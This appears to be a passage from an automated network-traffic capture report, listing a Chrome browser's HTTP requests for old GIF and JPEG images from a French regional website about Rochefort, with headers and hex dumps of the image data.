Jan 15, 2025 10:25:20.833077908 CET	844	IN	Data Raw: 77 68 7e da c5 10 b5 11 15 93 92 a1 c1 e3 58 95 d4 2f 45 e5 d2 70 38 c5 31 f0 43 36 ae d9 db a6 0a d8 22 89 0f d6 60 51 f8 b8 87 5a 0f 40 54 f7 26 2c bd 51 e7 06 8e 7b 73 d7 1d 06 80 22 73 5e bd 81 cd 42 80 64 f4 39 31 a1 40 47 bb ec 93 7d b3 68 Data Ascii: wh~X/Ep81C6"`QZ@T&,Q{s"s^Bd91@G}hw7c@_t/@qCsS63yN,!`y}fh6,sv8DtYES[SF]y3o02:Z7)PR8:k l/A]&YaB/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.198359013 CET	448	OUT	GET /ville_de_rochefort/Roch/Pict/Env2.gif HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:20.823484898 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: image/gif Content-Length: 1797 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:05 GMT ETag: "705-3db69e3800940" Accept-Ranges: bytes Data Raw: 47 49 46 38 37 61 47 00 70 00 f7 00 00 ff ff ff ff ff cc ff ff 99 ff ff 66 ff ff 33 ff ff 00 ff cc ff ff cc cc ff cc 99 ff cc 66 ff cc 33 ff cc 00 ff 99 ff ff 99 cc ff 99 99 ff 99 66 ff 99 33 ff 99 00 ff 66 ff ff 66 cc ff 66 99 ff 66 66 ff 66 33 ff 66 00 ff 33 ff ff 33 cc ff 33 99 ff 33 66 ff 33 33 ff 33 00 ff 00 ff ff 00 cc ff 00 99 ff 00 66 ff 00 33 ff 00 00 cc ff ff cc ff cc cc ff 99 cc ff 66 cc ff 33 cc ff 00 cc cc ff cc cc cc cc cc 99 cc cc 66 cc cc 33 cc cc 00 cc 99 ff cc 99 cc cc 99 99 cc 99 66 cc 99 33 cc 99 00 cc 66 ff cc 66 cc cc 66 99 cc 66 66 cc 66 33 cc 66 00 cc 33 ff cc 33 cc cc 33 99 cc 33 66 cc 33 33 cc 33 00 cc 00 ff cc 00 cc cc 00 99 cc 00 66 cc 00 33 cc 00 00 99 ff ff 99 ff cc 99 ff 99 99 ff 66 99 ff 33 99 ff 00 99 cc ff 99 cc cc 99 cc 99 99 cc 66 99 cc 33 99 cc 00 99 99 ff 99 99 cc 99 99 99 99 99 66 99 99 33 99 99 00 99 66 ff 99 66 cc 99 66 99 99 66 66 99 66 33 99 66 00 99 33 ff 99 33 cc 99 33 99 99 33 66 99 33 33 99 33 00 99 00 ff 99 00 cc 99 00 99 99 00 66 99 00 33 99 00 00 66 [TRUNCATED] Data Ascii: GIF87aGpf3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3ffffff3fffffff3fffffff3ffffffffffff3fff3f3f3f3ff33f3ffffff3f3333f3333333f3333333f3333f3f3f3ff3f33f33333333f333333333f333f3f3f3ffffff3f3333f333f3wUD"wUD"wUD"wwwUUUDDD"""!Adobe ,GpH\#JHh A(S\Kd8sId5):QAhHdKJ=yS;U\ozWt6,E&'hFkr.QyfA&AQBx*AXR4q_ysY
Jan 15, 2025 10:25:20.823503017 CET	798	IN	Data Raw: e5 9c 15 75 6a c4 4d 43 47 3d c8 ba f3 d7 b7 b4 d5 6a bd bd 97 ae c1 da 3a 4f e6 c1 58 39 29 42 e0 38 4b af de eb ba 20 f0 94 cd 79 27 75 16 fd 75 cf 63 93 4b 0a 2c ce 53 61 ed ec da b7 23 ff f7 9a 10 39 50 ad e0 65 f3 dc 5d fe ad 33 c6 c4 6b 2b Data Ascii: ujMCG=j:OX9)B8K y'uucK,Sa#9Pe]3k+]V5_]`5V[Cz'XzqTV]X!b:$%UqPq(UC:#B>jP@yccdP(EHR%UNV@'Jt{u?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.236165047 CET	446	OUT	GET /ville_de_rochefort/Roch/Pict/M1.gif HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:20.866728067 CET	497	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 30 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 50 4d 6f 83 30 0c bd f3 2b bc 9e b6 43 63 5a 21 6d 87 28 d2 56 a8 56 89 76 a8 83 c3 4e 55 20 66 20 51 c2 92 50 b6 7f bf d0 6a d2 2e 96 3f 9e df f3 33 bf 8b df 36 f9 47 96 c0 6b be 4f 21 2b 5e d2 dd 06 16 4b c4 5d 92 6f 11 e3 3c be 4d d6 2c 44 4c 0e 0b 11 f0 c6 9d 3b c1 1b 92 ca 17 ae 75 1d 89 28 8c e0 a0 1d 6c f5 d8 2b 8e b7 66 c0 f1 0a e2 a5 56 3f f3 de 4a fc c3 f8 2a e0 83 c8 1b 02 43 5f 23 59 47 0a 8a 63 0a 78 69 bb 8e 4e 8a 4e 46 57 0d d5 da 38 3c fa 0c b3 b6 72 b8 5f b1 cf b6 86 49 5a e8 3d 59 3d 93 81 ee c1 35 ad 05 4b e6 42 86 71 1c 66 39 e3 83 54 ca 90 b5 e2 79 90 9e 0b d7 2c 62 8f 70 5f 94 63 ef c6 07 78 bf e2 41 3a 98 a6 89 95 da 28 92 e3 f7 52 e9 8a 55 fa 0c 99 97 86 a7 90 e3 1f 8b 77 74 f5 e2 af 9f 7f 10 fc 02 d9 8a 35 ac 3e 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 107MPMo0+CcZ!m(VVvNU f QPj.?36GkO!+^K]o<M,DL;u(l+fV?J*C_#YGcxiNNFW8<r_IZ=Y=5KBqf9Ty,bp_cxA:(RUwt5>0
Jan 15, 2025 10:25:21.122550964 CET	497	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 30 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 50 4d 6f 83 30 0c bd f3 2b bc 9e b6 43 63 5a 21 6d 87 28 d2 56 a8 56 89 76 a8 83 c3 4e 55 20 66 20 51 c2 92 50 b6 7f bf d0 6a d2 2e 96 3f 9e df f3 33 bf 8b df 36 f9 47 96 c0 6b be 4f 21 2b 5e d2 dd 06 16 4b c4 5d 92 6f 11 e3 3c be 4d d6 2c 44 4c 0e 0b 11 f0 c6 9d 3b c1 1b 92 ca 17 ae 75 1d 89 28 8c e0 a0 1d 6c f5 d8 2b 8e b7 66 c0 f1 0a e2 a5 56 3f f3 de 4a fc c3 f8 2a e0 83 c8 1b 02 43 5f 23 59 47 0a 8a 63 0a 78 69 bb 8e 4e 8a 4e 46 57 0d d5 da 38 3c fa 0c b3 b6 72 b8 5f b1 cf b6 86 49 5a e8 3d 59 3d 93 81 ee c1 35 ad 05 4b e6 42 86 71 1c 66 39 e3 83 54 ca 90 b5 e2 79 90 9e 0b d7 2c 62 8f 70 5f 94 63 ef c6 07 78 bf e2 41 3a 98 a6 89 95 da 28 92 e3 f7 52 e9 8a 55 fa 0c 99 97 86 a7 90 e3 1f 8b 77 74 f5 e2 af 9f 7f 10 fc 02 d9 8a 35 ac 3e 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 107MPMo0+CcZ!m(VVvNU f QPj.?36GkO!+^K]o<M,DL;u(l+fV?J*C_#YGcxiNNFW8<r_IZ=Y=5KBqf9Ty,bp_cxA:(RUwt5>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.552494049 CET	309	OUT	GET /ville_de_rochefort/Roch/Pict/Boy.gif HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:21.174998999 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:21 GMT Content-Type: image/gif Content-Length: 1409 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:31 GMT ETag: "581-3db69e50cc3c0" Accept-Ranges: bytes Data Raw: 47 49 46 38 37 61 2a 00 23 00 f7 00 00 ff ff ff ff ff cc ff ff 99 ff ff 66 ff ff 33 ff ff 00 ff cc ff ff cc cc ff cc 99 ff cc 66 ff cc 33 ff cc 00 ff 99 ff ff 99 cc ff 99 99 ff 99 66 ff 99 33 ff 99 00 ff 66 ff ff 66 cc ff 66 99 ff 66 66 ff 66 33 ff 66 00 ff 33 ff ff 33 cc ff 33 99 ff 33 66 ff 33 33 ff 33 00 ff 00 ff ff 00 cc ff 00 99 ff 00 66 ff 00 33 ff 00 00 cc ff ff cc ff cc cc ff 99 cc ff 66 cc ff 33 cc ff 00 cc cc ff cc cc cc cc cc 99 cc cc 66 cc cc 33 cc cc 00 cc 99 ff cc 99 cc cc 99 99 cc 99 66 cc 99 33 cc 99 00 cc 66 ff cc 66 cc cc 66 99 cc 66 66 cc 66 33 cc 66 00 cc 33 ff cc 33 cc cc 33 99 cc 33 66 cc 33 33 cc 33 00 cc 00 ff cc 00 cc cc 00 99 cc 00 66 cc 00 33 cc 00 00 99 ff ff 99 ff cc 99 ff 99 99 ff 66 99 ff 33 99 ff 00 99 cc ff 99 cc cc 99 cc 99 99 cc 66 99 cc 33 99 cc 00 99 99 ff 99 99 cc 99 99 99 99 99 66 99 99 33 99 99 00 99 66 ff 99 66 cc 99 66 99 99 66 66 99 66 33 99 66 00 99 33 ff 99 33 cc 99 33 99 99 33 66 99 33 33 99 33 00 99 00 ff 99 00 cc 99 00 99 99 00 66 99 00 33 99 00 00 66 [TRUNCATED] Data Ascii: GIF87a#f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3ffffff3fffffff3fffffff3ffffffffffff3fff3f3f3f3ff33f3ffffff3f3333f3333333f3333333f3333f3f3f3ff3f33f33333333f333333333f333f3f3f3ffffff3f3333f333f3wUD"wUD"wUD"wwwUUUDDD"""!Adobe !,#H*\H1%Q$F4ftIh@wp8";VF2hXq@ztk:Z,,HddH-6X),d$nli4:^{g9sfNw=
Jan 15, 2025 10:25:21.175009966 CET	410	IN	Data Raw: d8 55 b4 d2 9a 02 5b ec 18 98 e5 22 80 16 3a ea d5 9b f1 c5 9e 8a 2f 2c d8 4e 36 78 20 8b 47 17 4a 67 94 ac 07 20 ac c0 7a 3b d4 02 f8 f8 9a 06 82 00 b8 c5 1e 36 d8 62 ab e5 15 c2 03 dc 74 3a ba c6 8c 96 08 b2 70 ff 9e a1 f3 68 54 bf 4b 07 c6 f4 Data Ascii: U[":/,N6x GJg z;6bt:phTK%UgAxuRJT@rF= -EM-U_\U\|@}@c5(U)\#VYQqNUydXQF@(f. X]UtbGgUGJG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.552542925 CET	310	OUT	GET /ville_de_rochefort/Roch/Pict/Roch.gif HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:21.190264940 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:21 GMT Content-Type: image/gif Content-Length: 2982 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:45:00 GMT ETag: "ba6-3db69dfa03700" Accept-Ranges: bytes Data Raw: 47 49 46 38 37 61 ff 00 39 00 f7 00 00 ff ff ff ff ff cc ff ff 99 ff ff 66 ff ff 33 ff ff 00 ff cc ff ff cc cc ff cc 99 ff cc 66 ff cc 33 ff cc 00 ff 99 ff ff 99 cc ff 99 99 ff 99 66 ff 99 33 ff 99 00 ff 66 ff ff 66 cc ff 66 99 ff 66 66 ff 66 33 ff 66 00 ff 33 ff ff 33 cc ff 33 99 ff 33 66 ff 33 33 ff 33 00 ff 00 ff ff 00 cc ff 00 99 ff 00 66 ff 00 33 ff 00 00 cc ff ff cc ff cc cc ff 99 cc ff 66 cc ff 33 cc ff 00 cc cc ff cc cc cc cc cc 99 cc cc 66 cc cc 33 cc cc 00 cc 99 ff cc 99 cc cc 99 99 cc 99 66 cc 99 33 cc 99 00 cc 66 ff cc 66 cc cc 66 99 cc 66 66 cc 66 33 cc 66 00 cc 33 ff cc 33 cc cc 33 99 cc 33 66 cc 33 33 cc 33 00 cc 00 ff cc 00 cc cc 00 99 cc 00 66 cc 00 33 cc 00 00 99 ff ff 99 ff cc 99 ff 99 99 ff 66 99 ff 33 99 ff 00 99 cc ff 99 cc cc 99 cc 99 99 cc 66 99 cc 33 99 cc 00 99 99 ff 99 99 cc 99 99 99 99 99 66 99 99 33 99 99 00 99 66 ff 99 66 cc 99 66 99 99 66 66 99 66 33 99 66 00 99 33 ff 99 33 cc 99 33 99 99 33 66 99 33 33 99 33 00 99 00 ff 99 00 cc 99 00 99 99 00 66 99 00 33 99 00 00 66 [TRUNCATED] Data Ascii: GIF87a9f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3ffffff3fffffff3fffffff3ffffffffffff3fff3f3f3f3ff33f3ffffff3f3333f3333333f3333333f3333f3f3f3ff3f33f33333333f333333333f333f3f3f3ffffff3f3333f333f3wUD"wUD"wUD"wwwUUUDDD"""!Adobe !,9H*\#JH3j CI(S&"{+b &<s'QUlf) si<H.IUSQ'VeeEH<,Yfev=kK^^U)0cuYg+.&Xn{YL?
Jan 15, 2025 10:25:21.190274000 CET	1236	IN	Data Raw: 6c d5 69 67 b7 a4 ee 49 0e 5d 99 ea e7 7b 48 49 90 9e 9a 27 0f 20 64 cf 48 7d 2e 1c ba 63 95 d9 79 56 dc 7b 72 ef 5e 1e b1 6e 9f e0 5b bd f8 c9 ec cf 2b 90 22 b7 5a 05 fa 8a 2a d5 ed ad e0 dd 7b 23 d1 a2 c5 a1 17 ff ff 5e 34 38 ec ee e4 77 42 37 Data Ascii: ligI]{HI' dH}.cyV{r^n[+"Z{#^48wB76f3?Y'"B_f6eM^fhn~Dy\LXsTc\|%@n}OlMVa^!\|AFFiSU#F$0_[aVn9
Jan 15, 2025 10:25:21.190283060 CET	747	IN	Data Raw: 4f dd 72 42 89 24 31 54 0a 3d 68 62 9e 29 3e 14 d2 32 21 60 f5 08 57 39 c8 aa ac 85 27 ac 35 7a a9 14 0b b4 20 a2 96 6d 6b 64 54 97 cb 8c 22 22 bf 1e a8 93 36 42 c8 68 d4 c5 b5 a2 64 31 93 6e 19 05 03 23 45 ad fd f4 72 85 39 64 d2 1f 8a 13 28 67 Data Ascii: OrB$1T=hb)>2!`W9'5z mkdT""6Bhd1n#Er9d(gHH#S#UO=EC3F2!{$8c_/5(*WUmd+guG1Yue$c334;)T3BvO);]YoV.ct5XD>I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.834433079 CET	310	OUT	GET /ville_de_rochefort/Roch/Pict/Env2.gif HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:21.469554901 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:21 GMT Content-Type: image/gif Content-Length: 1797 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:05 GMT ETag: "705-3db69e3800940" Accept-Ranges: bytes Data Raw: 47 49 46 38 37 61 47 00 70 00 f7 00 00 ff ff ff ff ff cc ff ff 99 ff ff 66 ff ff 33 ff ff 00 ff cc ff ff cc cc ff cc 99 ff cc 66 ff cc 33 ff cc 00 ff 99 ff ff 99 cc ff 99 99 ff 99 66 ff 99 33 ff 99 00 ff 66 ff ff 66 cc ff 66 99 ff 66 66 ff 66 33 ff 66 00 ff 33 ff ff 33 cc ff 33 99 ff 33 66 ff 33 33 ff 33 00 ff 00 ff ff 00 cc ff 00 99 ff 00 66 ff 00 33 ff 00 00 cc ff ff cc ff cc cc ff 99 cc ff 66 cc ff 33 cc ff 00 cc cc ff cc cc cc cc cc 99 cc cc 66 cc cc 33 cc cc 00 cc 99 ff cc 99 cc cc 99 99 cc 99 66 cc 99 33 cc 99 00 cc 66 ff cc 66 cc cc 66 99 cc 66 66 cc 66 33 cc 66 00 cc 33 ff cc 33 cc cc 33 99 cc 33 66 cc 33 33 cc 33 00 cc 00 ff cc 00 cc cc 00 99 cc 00 66 cc 00 33 cc 00 00 99 ff ff 99 ff cc 99 ff 99 99 ff 66 99 ff 33 99 ff 00 99 cc ff 99 cc cc 99 cc 99 99 cc 66 99 cc 33 99 cc 00 99 99 ff 99 99 cc 99 99 99 99 99 66 99 99 33 99 99 00 99 66 ff 99 66 cc 99 66 99 99 66 66 99 66 33 99 66 00 99 33 ff 99 33 cc 99 33 99 99 33 66 99 33 33 99 33 00 99 00 ff 99 00 cc 99 00 99 99 00 66 99 00 33 99 00 00 66 [TRUNCATED] Data Ascii: GIF87aGpf3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3ffffff3fffffff3fffffff3ffffffffffff3fff3f3f3f3ff33f3ffffff3f3333f3333333f3333333f3333f3f3f3ff3f33f33333333f333333333f333f3f3f3ffffff3f3333f333f3wUD"wUD"wUD"wwwUUUDDD"""!Adobe ,GpH\#JHh A(S\Kd8sId5):QAhHdKJ=yS;U\ozWt6,E&'hFkr.QyfA&AQBx*AXR4q_ysY
Jan 15, 2025 10:25:21.469566107 CET	798	IN	Data Raw: e5 9c 15 75 6a c4 4d 43 47 3d c8 ba f3 d7 b7 b4 d5 6a bd bd 97 ae c1 da 3a 4f e6 c1 58 39 29 42 e0 38 4b af de eb ba 20 f0 94 cd 79 27 75 16 fd 75 cf 63 93 4b 0a 2c ce 53 61 ed ec da b7 23 ff f7 9a 10 39 50 ad e0 65 f3 dc 5d fe ad 33 c6 c4 6b 2b Data Ascii: ujMCG=j:OX9)B8K y'uucK,Sa#9Pe]3k+]V5_]`5V[Cz'XzqTV]X!b:$%UqPq(UC:#B>jP@yccdP(EHR%UNV@'Jt{u?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49750	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.841597080 CET	311	OUT	GET /ville_de_rochefort/Roch/Pict/Boya1.jpg HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:21.470005035 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:21 GMT Content-Type: image/jpeg Content-Length: 3078 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:23 GMT ETag: "c06-3db69e492b1c0" Accept-Ranges: bytes Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c2 00 11 08 00 5b 00 82 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 ff c4 00 18 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 02 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 c8 07 a7 cc 00 00 04 c4 0c a3 2d cf 49 36 56 5c a6 e5 19 8d 79 ba e6 a0 58 12 2c 12 e2 b6 ec 73 b0 d9 2d 45 39 bb 68 84 4b a9 99 98 6a 8a b2 b4 73 f5 73 f4 e1 40 6b 8c 81 3b bb 73 e9 e6 f5 6a eb e1 aa 25 b0 51 77 cd 4b 4b 6b 64 cc 14 cc 1d 4e 5d 89 36 9a 65 8c 84 ab b4 65 d3 cb [TRUNCATED] Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO["-I6V\yX,s-E9hKjss@k;sj%QwKKkdN]6eeM\|eS^%_n~:rY6kgW^^VdV&!5%yb`n}QXEI2[R& !"12304@bpJ(+4C8Oj+D\9{enmAn4ITIbA{rlJ.?a}d{6\|`avM}N_ROiPO5_=7Gc,:6/9<A2Esrb5-%flOa>Bxi96,7wi&dC3Y(vqB{>z~;O 1!?G<SGT$R-b !1?+zrDn]}#O-! "1AQ2aq0@BR?9hW5+b5XH* Tx[_J='47rq<
Jan 15, 2025 10:25:21.470016003 CET	1236	IN	Data Raw: 3a bf e9 41 0f ae ca 9f 57 80 45 ad 16 60 6c a4 6e 6a 15 18 5c b0 eb b2 c4 4c 4f 03 03 ba a9 10 89 33 6b 75 d4 a2 2b 45 5b 99 4a 69 54 58 9a 2a a8 2c a2 58 0f ca c6 a8 d0 8e 4b 00 93 a2 e6 88 db 55 31 5c 94 0f c6 f3 50 99 c3 97 0c 64 1f 68 58 22 Data Ascii: :AWE`lnj\LO3ku+E[JiTX,XKU1\PdhX"]Y. t]x@ET&,wL!u?e\1$(0rVBm@FA-V0O@V\mnM"}.e"V8oUJIYaz4,#WWsTkA&
Jan 15, 2025 10:25:21.470026970 CET	844	IN	Data Raw: 77 68 7e da c5 10 b5 11 15 93 92 a1 c1 e3 58 95 d4 2f 45 e5 d2 70 38 c5 31 f0 43 36 ae d9 db a6 0a d8 22 89 0f d6 60 51 f8 b8 87 5a 0f 40 54 f7 26 2c bd 51 e7 06 8e 7b 73 d7 1d 06 80 22 73 5e bd 81 cd 42 80 64 f4 39 31 a1 40 47 bb ec 93 7d b3 68 Data Ascii: wh~X/Ep81C6"`QZ@T&,Q{s"s^Bd91@G}hw7c@_t/@qCsS63yN,!`y}fh6,sv8DtYES[SF]y3o02:Z7)PR8:k l/A]&YaB/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.900311947 CET	310	OUT	GET /ville_de_rochefort/Roch/Pict/Boya.jpg HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:21.509500980 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:21 GMT Content-Type: image/jpeg Content-Length: 15450 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:26 GMT ETag: "3c5a-3db69e4c07880" Accept-Ranges: bytes Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c2 00 11 08 00 da 01 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 ff c4 00 18 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 50 0f 4f 98 00 00 00 00 00 00 00 00 00 00 2e d4 d2 43 89 80 17 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 6b a1 9d 52 e1 60 5f 55 5c 6f 5c de 78 ed a5 40 7b 43 9a 74 b3 12 87 8b 11 18 c3 59 80 2c 00 00 00 00 00 00 00 00 d2 d9 de 24 4e b2 06 e6 03 9a 63 69 [TRUNCATED] Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8"PO.C kR`_U\o\x@{CtY,$Nci]9HqK]n0IFy=~U)KMd3HSv)gK4j'4[ztbNFs<'s]U[c5}]Vp]-K_ZTB$u:\s:sblH=O3VWEu1K;Aslh7w=3U&2Q4GX:@K_=J\&kGLWFu\c+?ys_o,DO~JQ>ZCD69wCGa&G3=\ $,z'9(L$ZL;.Q;5R u3dZ@xOj3g{}/gM$"g:eicK-cR.cztUS$hhgZ{r]SxVf7H:BBKG.tSiw"SiZoXjI)h2lkVj.gy7LuwFpV8m-64iPRI:ebrL+VsbXu
Jan 15, 2025 10:25:21.509524107 CET	1236	IN	Data Raw: ad 11 01 5a c9 60 90 90 09 89 09 92 a0 98 dc 90 35 34 a5 35 c4 a9 d3 45 70 37 c1 66 60 8a 58 02 f8 eb 8b 79 22 09 9b 44 44 95 94 cd ea b8 c9 54 9b 86 75 be 45 ad 12 00 00 01 6a d8 92 d5 d4 08 d3 70 20 d4 ff c4 00 2b 10 00 02 02 01 03 03 04 01 04 Data Ascii: Z`545Ep7f`Xy"DDTuEjp +!1 "0A2#3B$@PCX-EkF96liRzv}NJ8a+viRmk7l{::8=.Z0Vj**tdoox@
Jan 15, 2025 10:25:21.509536028 CET	1236	IN	Data Raw: 0b 32 04 d7 35 a8 06 d1 1a e8 ce 4c 26 0c cd 13 c4 cc c6 26 a9 ab 03 5e 7e 1c fa 8c 2a 27 b8 45 b2 07 9a b8 d7 35 4d 53 54 2d 32 73 a8 42 d1 55 dd 85 71 55 3b 64 43 cc c4 c4 c4 c4 03 1e 91 df 54 26 67 b7 33 99 ab d1 89 a6 69 9a 4c 19 9e e9 d3 54 Data Ascii: 25L&&^~*'E5MST-2sBUqU;dCT&g3iLT-+]0!cw;V;sA"=33 39=>AL}->u-r>}}\|># 0@1?WJg:u
